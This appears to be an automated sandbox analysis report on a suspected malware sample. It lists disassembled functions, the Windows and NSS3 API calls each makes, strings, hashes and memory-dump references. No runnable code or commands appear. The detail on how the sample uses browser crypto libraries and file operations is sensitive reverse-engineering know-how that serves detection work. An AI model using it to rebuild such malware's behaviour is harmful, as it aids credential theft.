Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 1ce5a07eb5afa6df937e26471f406ee44e42c3282b0fef8cc4ca58c7b53e0463
Instruction ID: 7caf6d44b3d52aa8653e3b3b8caef3af5c3198261ed3079069455963f8a9543d
Opcode Fuzzy Hash: 1ce5a07eb5afa6df937e26471f406ee44e42c3282b0fef8cc4ca58c7b53e0463
Instruction Fuzzy Hash: 0731F471F0522997C710CFADC8809BAB7F2AF4A309B590196F448B7B81D275E841CBB0

Function 00621CBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00621CDE

Part of subcall function 00640478: std::exception::exception.LIBCMT ref: 0064048D
Part of subcall function 00640478: __CxxThrowException@8.LIBCMT ref: 006404A2
Part of subcall function 00640478: std::exception::exception.LIBCMT ref: 006404B3

__EH_prolog3_catch.LIBCMT ref: 00621D7D
std::_Xinvalid_argument.LIBCPMT ref: 00621D91

Strings

vector<T> too long, xrefs: 00621CD9, 00621D8C

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: d676b8882c067725a2850428694a1664ca2ad9e53ffd35b39e389de40f1980c0
Instruction ID: 917ecb88e451a80069ce331f3453f94613cddb77011fc14654a805e0df8c21b2
Opcode Fuzzy Hash: d676b8882c067725a2850428694a1664ca2ad9e53ffd35b39e389de40f1980c0
Instruction Fuzzy Hash: FA310832F407258FDB99EFA8EC516DD77E6BB1A311F00002EE500EB2E0EA7489008F94

Function 006209D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 006209D7
std::_Xinvalid_argument.LIBCPMT ref: 006209FD

Part of subcall function 00640478: std::exception::exception.LIBCMT ref: 0064048D
Part of subcall function 00640478: __CxxThrowException@8.LIBCMT ref: 006404A2
Part of subcall function 00640478: std::exception::exception.LIBCMT ref: 006404B3

Part of subcall function 00620927: malloc.MSVCRT ref: 00620936
Part of subcall function 00620927: __CxxThrowException@8.LIBCMT ref: 00620951

Strings

vector<T> too long, xrefs: 006209F8

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$H_prolog3_catchXinvalid_argumentmallocstd::_
String ID: vector<T> too long
API String ID: 285619538-3788999226
Opcode ID: 1dec7f1f64559688baa1ef9b5a56f2b3af0a72e9f44fadb3a8c16b4964533309
Instruction ID: c5e51ac9a8170c7032dde11cc9a57af885242b07d99851f5dff788a363ed985e
Opcode Fuzzy Hash: 1dec7f1f64559688baa1ef9b5a56f2b3af0a72e9f44fadb3a8c16b4964533309
Instruction Fuzzy Hash: 80317A71A00A1A9FEB10DF68D8419AEBBE6BF94310B20852DE95A97352DB30E941CF54

Function 6C376C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C376D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C376D20
database corruption, xrefs: 6C376D2A
%s at line %d of [%.10s], xrefs: 6C376D2F

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 477af8938f6c22afe0eac014caace353f3978ae25d551c25d77925b937b1a46a
Instruction ID: 523f600f79a04eeb54a22651477fe5e955b13dbc655470809bc99ee33acc6b39
Opcode Fuzzy Hash: 477af8938f6c22afe0eac014caace353f3978ae25d551c25d77925b937b1a46a
Instruction Fuzzy Hash: 4C21E2706147059BC720CE1AC961B5AB7F5AF84308F244528D88A9BF51E375E944CFB6

Function 6C4ACC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C4ACD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C4ACC7B), ref: 6C4ACD7A
Part of subcall function 6C4ACD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C4ACD8E
Part of subcall function 6C4ACD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C4ACDA5
Part of subcall function 6C4ACD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C4ACDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C4ACCB5
memcpy.VCRUNTIME140(6C5414F4,6C5402AC,00000090), ref: 6C4ACCD3
memcpy.VCRUNTIME140(6C541588,6C5402AC,00000090), ref: 6C4ACD2B

Part of subcall function 6C3C9AC0: socket.WSOCK32(?,00000017,6C3C99BE), ref: 6C3C9AE6
Part of subcall function 6C3C9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C3C99BE), ref: 6C3C9AFC

Part of subcall function 6C3D0590: closesocket.WSOCK32(6C3C9A8F,?,?,6C3C9A8F,00000000), ref: 6C3D0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C4ACCB0

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 7fcae60a3ec68b815167f978d68d40fc94ec232f1e971c5057ee84d9cf12a7ae
Instruction ID: 0e7289f7d35850d6631b561314155487992637f698b678a07e9125c243e981f1
Opcode Fuzzy Hash: 7fcae60a3ec68b815167f978d68d40fc94ec232f1e971c5057ee84d9cf12a7ae
Instruction Fuzzy Hash: 901160B1A002405EDB50EF59DC46FC37AB8939631CF129129E515CBB42EB71D4258FDA

Function 00623B2B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00623B55

Strings

image/jpeg, xrefs: 00623B7D
{<b, xrefs: 00623B35, 00623B6C, 00623B3A

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg${<b
API String ID: 2803490479-1671564715
Opcode ID: 67c6e3d9fc21669dea3e72f61f9fc569849467afc2dd1a956f406afd412ab06b
Instruction ID: 38da5b2196635100922f1842b6814a4f513e08b1c97b7dd985f508741dc4c045
Opcode Fuzzy Hash: 67c6e3d9fc21669dea3e72f61f9fc569849467afc2dd1a956f406afd412ab06b
Instruction Fuzzy Hash: 9511C672900A24FF8B109FA4DC8488E7F7BFE51362721426AE915A3290D7759F409E50

Function 006239BD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00624147,?), ref: 006239C8
HeapAlloc.KERNEL32(00000000), ref: 006239CF
wsprintfW.USER32 ref: 006239E0

Strings

%hs, xrefs: 006239DA

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: a06dbea227f87992d41985de8ee830250d42a7b279303b6f67d1eab678668d2c
Instruction ID: 34e2071dea8aa3e9babef3499a46833321b1e49db3d342f4e54d668fe4bec065
Opcode Fuzzy Hash: a06dbea227f87992d41985de8ee830250d42a7b279303b6f67d1eab678668d2c
Instruction Fuzzy Hash: 05D05E3568021877C72017E5AC09A963B19DF07AA2F001021FA0DC9150CA6149E487D5

Function 006113E6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006113F2
GetDeviceCaps.GDI32(00000000,0000000A), ref: 006113FD
ReleaseDC.USER32(00000000,00000000), ref: 00611406

Strings

DISPLAY, xrefs: 006113ED

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: ca44dddf290876720b604881c00347e9baf2480cf2b67761b02bb5e53c91c403
Instruction ID: 28fcc43b4ca7d7f0a8712212699ff25ae950671596942ecd5ccfe3628f430244
Opcode Fuzzy Hash: ca44dddf290876720b604881c00347e9baf2480cf2b67761b02bb5e53c91c403
Instruction Fuzzy Hash: F6D0C9393C024076E3301764AC4EF5A2926D7C7F02F101004F2019C0D04AA411C19526

Function 0061BF6A Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

CopyFileA.KERNEL32(?,?,00000001), ref: 0061C00F
lstrlenA.KERNEL32(?), ref: 0061C1C5
lstrlenA.KERNEL32(?), ref: 0061C1E0
DeleteFileA.KERNEL32(?), ref: 0061C232

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 09710cc8c1811cc7c0af83614f2656a1ee75974bc50dd3c795fdfcc317988db4
Instruction ID: 9d83f075e46892e235dc901c946b90caf473b58ae4bab8f682bdcdfeb6040b5e
Opcode Fuzzy Hash: 09710cc8c1811cc7c0af83614f2656a1ee75974bc50dd3c795fdfcc317988db4
Instruction Fuzzy Hash: 2F81EC32E0011AABCF40FBA9ED569DD7776BF04311F150429FA00B7162DB226FA68F95

Function 6C451D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C451D8F

Part of subcall function 6C4414C0: TlsGetValue.KERNEL32 ref: 6C4414E0
Part of subcall function 6C4414C0: EnterCriticalSection.KERNEL32 ref: 6C4414F5
Part of subcall function 6C4414C0: PR_Unlock.NSS3 ref: 6C44150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C451DA6

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C451E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C451ED0

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: b21e5749677a6a6701e2b74e4ff4ed1390019011441cc551f0490ca4c6ef95dc
Instruction ID: b56b508b55caee53193700cbb3d29cd29425fdd0efa91e746821df7dd438187b
Opcode Fuzzy Hash: b21e5749677a6a6701e2b74e4ff4ed1390019011441cc551f0490ca4c6ef95dc
Instruction Fuzzy Hash: 28516675A002099BEB00CF98C884FAEB7B6FF49309F548129E81A9B750D771E955CB90

Function 6C4B7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4B7E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4B7EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4B7EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C4B7ED8

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: c4ebf0c77263e3bee254715e2845b16625eedfa1c2d4bddd59119b11262bfc01
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: EA31B5B1A041118FDB04CF19C891D9ABBE2FFC831871B8169D8586BB11EB71EC45CBE1

Function 6C3E6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C3E6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C3E6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C3E6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C508FE0), ref: 6C3E6CFE

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: a55cce53481c3e0a630b8b91c19cf10f0bcd30232ec82461da9fbdf09f5ab2e2
Instruction ID: 7704133e62d3995a329ec92883a6620301cfd1a3f36ccea9b82c611273ca5d93
Opcode Fuzzy Hash: a55cce53481c3e0a630b8b91c19cf10f0bcd30232ec82461da9fbdf09f5ab2e2
Instruction Fuzzy Hash: 833185B1A0121A9FEB04DF65C851ABFB7F5EF89248B10442ED905D7710EB319915CBA0

Function 0062D7A8 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0062DD71,?,00628C76,?), ref: 0062D7FB
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0062DD71,?,00628C76), ref: 0062D82B
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0062DD71,?,00628C76,?), ref: 0062D857
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0062DD71,?,00628C76,?), ref: 0062D865

Part of subcall function 0062D173: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0062D1A7

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
